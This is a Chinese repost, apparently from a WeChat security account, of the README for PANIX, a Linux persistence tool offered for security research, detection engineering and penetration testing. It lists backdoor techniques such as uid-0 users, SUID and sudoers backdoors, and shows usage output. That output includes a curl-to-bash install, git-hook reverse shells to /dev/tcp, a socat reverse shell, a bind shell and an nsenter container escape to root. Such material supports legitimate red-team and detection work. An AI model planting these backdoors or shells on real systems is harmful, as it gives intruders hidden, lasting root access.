ANIX 是一款高度可定制的 Linux 持久性工具,可用于安全研究、检测工程、渗透测试、CTF 等。它优先考虑功能性而非隐身性,并且易于检测。PANIX 支持 Debian、Ubuntu 和 RHEL 等流行发行版,并且高度可定制以适应各种操作系统环境。PANIX 将与在野外观察到的最常见的 *nix 持久性机制保持同步。
特征
PANIX 提供了一套多功能的功能用于模拟和研究 Linux 持久性机制。
| 特征 | 描述 | Root | User |
|---|---|---|---|
| At Job Persistence | At job persistence | ✓ | ✓ |
| Authorized Keys Persistence | Add public key to authorized keys | ✓ | ✓ |
| Backdoor User | Create backdoor user with uid=0 | ✓ | ✗ |
| Bind Shell | Execute backgrounded bind shell | ✓ | ✓ |
| Capabilities Backdoor | Add capabilities for persistence | ✓ | ✗ |
| Cron Job Persistence | Cron job persistence | ✓ | ✓ |
| Create User | Create a new user | ✓ | ✗ |
| Git Persistence | Git hook/pager persistence | ✓ | ✓ |
| Generator Persistence | Systemd generator persistence | ✓ | ✗ |
| Init.d Backdoor | SysV Init (init.d) persistence | ✓ | ✗ |
| Malicious Package Backdoor | DPKG/RPM package persistence | ✓ | ✗ |
| Docker Container Backdoor | Docker container with host escape | ✓ | ✓ |
| MOTD Backdoor | Message Of The Day (MOTD) persistence | ✓ | ✗ |
| Package Manager Persistence | Package Manager persistence (APT/YUM/DNF) | ✓ | ✗ |
| /etc/passwd Modification | Add user to /etc/passwd directly | ✓ | ✗ |
| Password Change | Change user password | ✓ | ✗ |
| RC.local Backdoor | Run Control (rc.local) persistence | ✓ | ✗ |
| Shell Profile Persistence | Shell profile persistence | ✓ | ✓ |
| SSH Key Persistence | SSH key persistence | ✓ | ✓ |
| Sudoers Backdoor | Sudoers persistence | ✓ | ✗ |
| SUID Backdoor | SUID persistence | ✓ | ✗ |
| System Binary Backdoor | System binary wrapping for persistence | ✓ | ✗ |
| Systemd Service Persistence | Systemd service persistence | ✓ | ✓ |
| Udev Persistence | Udev (driver) persistence | ✓ | ✗ |
| XDG Autostart Persistence | XDG autostart persistence | ✓ | ✓ |
PANIX 为各种 Linux 发行版提供全面支持。
过时或自定义的 Linux 发行版可能使用不同的配置或缺少特定功能,这可能会导致未经测试的版本上的机制失败。如果默认命令失败,--custom大多数功能中的标志允许您自定义路径/命令以适合您的环境。如果这不起作用,您可以检查脚本以了解并根据您的需求进行调整。
| 分配 | 支持 | 已测试 |
|---|---|---|
| Debian | ✓ | 在 Debian 11 和 12 上经过全面测试 |
| Ubuntu | ✓ | 在 Ubuntu 22.04 上进行了全面测试 |
| 红帽企业版 | ✓ | 在 RHEL 9 上进行了全面测试(MOTD 不可用) |
| CentOS | ✓ | 在 CentOS Stream 9、7 上进行了全面测试(MOTD 不可用) |
| Fedora | ✓ | 未经过全面测试 |
| Arch Linux | ✓ | 未经过全面测试 |
| OpenSUSE | ✓ | 未经过全面测试 |
过时或自定义的 Linux 发行版可能使用不同的配置或缺少特定功能,这可能会导致未经测试的版本上的机制失败。如果默认命令失败,--custom大多数功能中的标志允许您自定义路径/命令以适合您的环境。如果这不起作用,您可以检查脚本以了解并根据您的需求进行调整。
入门
启动并运行 PANIX 非常简单,只需从发布页面下载脚本并执行它即可:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh | bash或者下载并手动执行:
# Download through curl or wgetcurl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -o panix.shwget https://github.com/Aegrah/PANIX/releases/download/panix-v1.0.0/panix.sh -O panix.sh# Grant execution permissions and execute the script.chmod +x panix.sh./panix.sh
执行脚本将显示root或user帮助菜单,具体取决于当前用户的权限。
panix@panix-demo:~$ sudo ./panix.sh__|__) / | | | _/| /~~ | | | /@RFGroenewoudRoot User Options:--at At job persistence--authorized-keys Add public key to authorized keys--backdoor-user Create backdoor user--bind-shell Execute backgrounded bind shell--cap Add capabilities persistence--create-user Create a new user--cron Cron job persistence--docker-container Docker container with host escape--generator Generator persistence--git Git hook/pager persistence--initd SysV Init (init.d) persistence--malicious-package Build and Install a package for persistence (DPKG/RPM)--motd Message Of The Day (MOTD) persistence (not available on RHEL derivatives)--package-manager Package Manager persistence (APT/YUM/DNF)--passwd-user Add user to /etc/passwd directly--password-change Change user password--rc-local Run Control (rc.local) persistence--shell-profile Shell profile persistence--ssh-key SSH key persistence--sudoers Sudoers persistence--suid SUID persistence--system-binary System binary persistence--systemd Systemd service persistence--udev Udev (driver) persistence--xdg XDG autostart persistence--revert Revert most changes made by PANIX's default options--quiet (-q) Quiet mode (no banner)
例子
该脚本应该基本上是不言自明的,但是,本节将展示一些如何使用 PANIX 的示例。
每个持久性机制都有一个单独的帮助菜单:
root@ubuntu2204:/home/ruben# ./panix.sh --udev --helpUsage: ./panix.sh--udev [OPTIONS]--examples Display command examples--default Use default udev settings--ip <ip> Specify IP address--port <port> Specify port number--at | --cron | --systemd Specify the mechanism to use--custom Use custom udev settings--command <command> Specify custom command--path <path> Specify custom path
每个持久性机制还具有一个--examples标志,显示默认和自定义示例,帮助您制定适合您的命令。
root@ubuntu2204:/home/ruben# ./panix.sh --git --examplesExamples:--default:./panix.sh --git --default --ip 10.10.10.10 --port 1337 --hook|--pager--custom:./panix.sh --git --custom --command"(nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &) &"--path"gitdir/.git/hooks/pre-commit"--hook./panix.sh --git --custom --command"nohup setsid /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/1337 0>&1' > /dev/null 2>&1 &${PAGER:-less}"--path"~/.gitconfig --pager"
大多数持久性机制非常简单,并且(希望)不需要太多解释。例如,只需执行以下命令即可设置 systemd 持久性:
root@ubuntu2204:/home/ruben# ./panix.sh --systemd --default --ip 10.10.10.10 --port 1337Service file created successfully!Timer file created successfully!Createdsymlink/etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.[+] Systemd service persistence established!
设置持久性机制时,脚本将让您知道它是否有效,并且在需要信息来使用持久性机制的情况下,将提供其他信息。例如绑定 shell 机制:
root@ubuntu2204:/home/ruben[] Bind shell binary /tmp/bd64 created and executedinthe background.[] The bind shellislisteningonport9001.[] To interact with itfroma different system, use: nc -nv <IP>9001[] Bind shell persistence established!
允许您与绑定 shell 进行交互:
❯nc-nv192.168.211.1309001(UNKNOWN)[192.168.211.130]9001 (?)openwhoamiroot
对于具有附加内置功能的机制也是如此,例如 Docker 持久性机制,具有内置的根主机逃逸:
ruben@ubuntu2204:~$ sudo ./panix.sh --docker-container --ip192.168.211.131--port330[+] Building10.4s (9/9) FINISHEDdocker:default=> [internal] load build definition from Dockerfile0.0s=> => transferringdockerfile:722B0.0s=> [internal] load metadata for docker.io/library/alpine:latest2.1s=> [internal] load .dockerignore0.0s=> => transferringcontext:2B0.0s=> [1/5] FROM docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e00.8s=> => resolve docker.io/library/alpine:latest@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e00.0s=> =>sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e01.85kB /1.85kB0.0s=> =>sha256:dabf91b69c191a1a0a1628fd6bdd029c0c4018041c7f052870bb13c5a222ae76528B /528B0.0s=> =>sha256:a606584aa9aa875552092ec9e1d62cb98d486f51f389609914039aabd94146871.47kB /1.47kB0.0s=> =>sha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e993.62MB /3.62MB0.4s=> => extractingsha256:ec99f8b99825a742d50fb3ce173d291378a46ab54b8ef7dd75e5654e2a296e990.2s=> [2/5] RUN apk add --no-cache bash socat sudo util-linux procps4.4s=> [3/5] RUN adduser -D lowprivuser0.6s=> [4/5] RUN echo'#!/bin/bash'>/usr/local/bin/entrypoint.sh && echo'while true; do /bin/bash -c "socat exec:"/bin/bash",pty,stderr,setsid,sigint,sane tcp:192.168.211.131:330" 0.8s=> [5/5] RUN echo '#!/bin/bash' > /usr/local/bin/escape.sh && echo 'sudo nsenter -t 1 -m -u -i -n -p -- su -' >> /usr/local/bin/escape.sh && chmod +x /usr/local/bin/escape.sh && ec 0.8s=> exporting to image0.6s=> => exporting layers0.6s=> => writing imagesha256:b36eb0d13ee1a0c57c3e6a1ee0255ef474986f44d65b177c539b2ffb1d2487900.0s=> => naming to docker.io/library/malicious-container0.0s86ce6b00e872bb8c21d0dae21e747e830bb70b44ab7946558e563bf7f4b626ef[+] Persistence through malicious Docker container complete.[+] To escape the container with root privileges, run'/usr/local/bin/escape.sh'.
它向您展示了如何逃离容器并访问主机。
❯ nc -nvlp330listening on [any]330...connect to [192.168.211.131]from(UNKNOWN) [192.168.211.130]4340086ce6b00e872:/$ /usr/local/bin/escape.sh/usr/local/bin/escape.shroot:~#
PANIX 可以通过命令清理大部分垃圾--revert。
root@ubuntu2204:/home/ruben[] Runningasroot...[] Cleaning Systemd persistence methods...[] Successfully cleaned persistence method Systemd[] Cleaning Cron persistence methods...[] Successfully cleaned persistence method Cron...[] Cleaning Docker persistence methods...[] Successfully cleaned persistence method Docker[] Cleaning Malicious package persistence methods...[] Successfully cleaned persistence method Malicious package
-
下载
https://github.com/Aegrah/PANIX原文始发于微信公众号(Ots安全):PANIX 是一款高度可定制的 Linux 持久性工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论